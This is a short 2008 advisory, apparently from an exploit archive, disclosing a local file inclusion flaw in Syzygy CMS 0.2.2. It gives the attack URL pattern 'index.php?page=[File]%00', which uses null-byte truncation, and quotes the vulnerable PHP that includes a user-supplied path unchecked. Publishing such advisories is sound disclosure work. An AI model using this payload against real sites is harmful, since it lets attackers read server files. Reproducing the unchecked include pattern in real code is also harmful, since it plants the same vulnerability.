syzygy-lfi.txt
Posted on 12 June 2008
[*]================================================================================[*] | _____ _ _ _ _____ | | |_ _| |__ (_)_ __ __| | | ____| _ ___ | | | | | '_ | | '__/ _` | | _|| | | |/ _ | | | | | | | | | | | (_| | | |__| |_| | __/ | | |_| |_| |_|_|_| \__,_| |_____\__, |\___| | | |___/ | | ____ _ _ | | / ___| ___ ___ _ _ _ __(_) |_ _ _ | | \___ / _ / __| | | | '__| | __| | | | | | ___) | __/ (__| |_| | | | | |_| |_| | | | |____/ \___|\___|\__,_|_| |_|\__|\__, | | | |___/ | [*]================================================================================[*] | Author: StAkeR ~ StAkeR@hotmail.it | [*]================================================================================[*] | Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen | [*]================================================================================[*] | Syzygy CMS 0.2.2 <= Local File Inclusion Vulnerabilty | [*]================================================================================[*] | http://surfnet.dl.sourceforge.net/sourceforge/syzygycms/syzygycms-0.2.2.tar.gz | [*]================================================================================[*] | index.php?page= [File]%00 | [*]================================================================================[*] <?php if (isset($_GET['page'])) { $page=$_GET['page']; }else{ $page='main.php'; } if(is_file($page)) { //add block to page include("./".$page); }else{ //error reading page! go to default error file 404error.php include("./404error.php"); } ?>
